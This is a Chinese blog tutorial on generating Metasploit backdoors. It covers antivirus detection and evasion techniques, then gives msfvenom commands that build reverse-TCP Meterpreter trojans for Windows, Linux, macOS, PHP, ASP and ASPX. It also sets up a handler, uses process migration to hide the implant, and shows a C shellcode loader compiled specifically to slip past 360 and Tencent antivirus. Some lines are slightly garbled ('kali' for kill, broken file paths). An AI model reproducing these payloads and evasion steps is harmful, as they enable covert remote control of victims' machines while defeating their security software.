zoukankan      html  css  js  c++  java
  • 渗透利器-kali工具 (第五章-6) Metasploit后门生成模块

    本文内容:

    • 免杀技术发展史
    • 杀软原理简介
    • 后门生成常用命令
    • 常见生成后门模式

    从后门生成模块到权限维持:

      免杀技术发展史:

        理论上讲,免杀一定是出现在杀毒软件之后的。

        通过杀毒软件的发展史不难使用,第一款杀毒软件kill 1.0 是Winsh公司1987年推出的。

        也就是说免杀技术至少在1989年以后才发展起来。[国外无从拷问,国内非常晚]

        1989年:第一款杀毒软件Mcafee诞生,标志着反病毒反差杀时代的到来

        1997年:国内出现了第一个可以自动变异的千面人病毒,自动变异就是病毒针对杀毒软件的免杀方法之一,但是与免杀手法的定义有出入。

        2002.7.31:国内第一个真正意义上的变种病毒"中国黑客II"出现,它处理具有新的特征之外,还实现了"中国黑客"第一代所谓实现的功能,可见这个变种也是病毒编写者自己制造的。

        2005.09:免杀技术开始真正的火起来。

        由上面的信息可见,国内在1997年出现了第一个可以自动变异的千面人病毒,虽然自动变异也可以看为是针对杀毒软件的一种免杀方法,但是由于与免杀手法的定义有出入,所以如果将国内免杀技术起源定位1997年会显得比较牵强。

        2002.7.31:国内第一个真正意义上的变种病毒"中国黑客II"才迟迟出现,因此我们暂且可以将国内免杀技术的起源定位在2002年7月。

      杀软原理简介:

        免杀感念:免除被杀:

        杀毒软件检测方式:  

          1.扫描压缩包技术:即是对压缩包和封装文件作为分析检查的技术。

          2.程序窜改防护:即是避免恶意程序借由删除杀毒侦测程序而大肆破坏电脑。

          3.修复技术:即是对 恶意程序所损坏的文件进行还原。

          4.急救盘杀毒:扫描最常用的磁盘,系统关键位置,耗时较短。

          5.智能扫描:扫描最常用的磁盘,系统关键位置,耗时较短。

          6.全盘扫描:扫描电脑全部磁盘,耗时较长。

          7.勒索软件防护:保护电脑中的文件不被黑盒恶意加密。

          8.开机扫描:当电脑开机时自动进行扫描,可以扫描压缩文档和可能不需要的程序。

        监控技术: 

          1.内存监控:当发现内存中存在病毒的时候,就主动报警;监控所有进程;监控读取到内存中的文件;监控读取到内存的网络数据。

          2.文件监控:当发现写到磁盘上的文件中存在病毒,或者是被病毒感染,就会主动报警。

          3.邮件监控:当发现电子邮件的附件存在病毒时进行拦截。

          4.网页防护:组织网络攻击和提醒用户可疑的应用程序行为。

          5.行为防护:

        扫描引擎:

          1.特征码扫描

          2.文件校验和法

          3.进程行为检测法[沙盒模式]

          4.主动防御技术

          5.机器学习识别技术

        免杀技术介绍:

          1.修改特征码

          2.花指令免杀

          3.加壳免杀

          4.内存免杀

          5.二次编译

          6.分离免杀

          7.资源修改

    1,后门生成常用命令:  

      从后门生成模块到权限维持:

        -p 指定payload模块

        -l 列出可用项

        -f 指定文件类型

        -e 加载编码器

        -b 删除无效字符

        -i 指定编码次数

        -x 捆绑文件

        -o 导出文件

        -v 指定变量名

      使用MSFvenom快速生成木马并且进行连接:

        生成一个常见木马文件:

          msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.221.143 lport=1250 -f exe > shell.exe

        连接木马文件:

          1.监听模块: use exploit/multi/handler

          2.设置payload:set payload windows/meterpreter/reverse_tcp

          3.查看设置选项:options需要设置选项:[lhost、lport]

          4.设置本机地址:set lhost 127.0.0.1

          5.设置端口:set lport 1433

          6.开始连接:run

          7.查看用户权限:getuid

        迁移进程:

          迁移进程命令:migrate

          ps:查看所有进程

          使用迁移进程命令:migrate 1433[进程PID]:将我们的进程迁移到我们想要迁移的进程里了,就发现不了我们的进程了。

        杀死进程:

          杀死进程命令:kill:杀死命令

          kali 5744[进程PID]

        补充:查看进程命令:?

    2,常见的生成后门模式:

      1.Windows:

        msfvenom –platform windows –a x86 –p windows/meterpreter/reverse_tcp –i 3 –e x86/shikata_ga_nai –f exe –o C:ack.exe 

        msfvenom –platform windows –a x86 –p windows/x64/meterpreter/reverse_tcp –f exe –o C:ack.exe

      2.Linux:

        msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

      3.MAC:

        msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

      4.PHP:
        msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.153.138 LPORT=1520 -f raw > shell.php

      5.ASP:

        msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

      6.ASPX:

        msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f aspx > shell.aspx   

    3,绕过360生成测试:

      1.安装编译软件VC++6.0

      2.生成木马后门:

        msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘x00’ lhost=192.168.177.128 lport=1250 -f c

      3.编译C语言为exe文件:

        #include "stdafx.h"
        #include <stdio.h>
        #pragma comment( linker, "/subsystem:"windows" /entry:"mainCRTStartup"")
        unsigned char buf[] =
        (这里放生成好的数组)
        main()
        {
        ((void(*)(void))&buf)();
        }

      4.测试是否成功:

      5.VC++6.0使用教程:

        1.新建Win32 Console Application工程:

          打开VC6.0,在菜单栏中选择“文件 -> 新建”,或者 Ctrl+N。

          切换到“工程”选项卡,选择“Win32 Console Application”,填写工程名称和路径,点击“确定”

        2.会弹出一个对话框询问类型,这里选择“一个简单的程序”

        3.点击树状列表-下方FiveView视图,选择-Source Files--xxx.cpp--打开

        4.将编译c语言为exe文件代码复制替换进去。

        5.将MSF生成的后门数组,放进去代码提示的地方。

        6.编译之后,组建即可。

        在线查杀:http://www.virscan.org  

        推荐一篇文章:http://c.biancheng.net/view/464.html

    4,绕过腾讯管家生成测试:

      与360生成测试部分一致,差异在于:

        需要添加图标进行绕过测试,将特征码改变

        在VC++6.0新建文件,编译,组建,改变.exe文件的内存大小,即成功,改变特征码。

        可以实现腾讯管家的绕过。

  • 相关阅读:
    CSS3 不定宽高水平垂直居中
    css 标题三条横线
    浏览器工作原理
    JS---原型继承和多重继承
    你在工作中无意间会犯的四个错误
    CNPC海外操作人员英语日常用语900句
    惊呆了!无聊感可激发创造力
    求职简历这些错你犯过吗?
    研究:低智商男人易出轨
    TED:6个月学会1门外语
  • 原文地址:https://www.cnblogs.com/xz25/p/12918873.html
Copyright © 2011-2022 走看看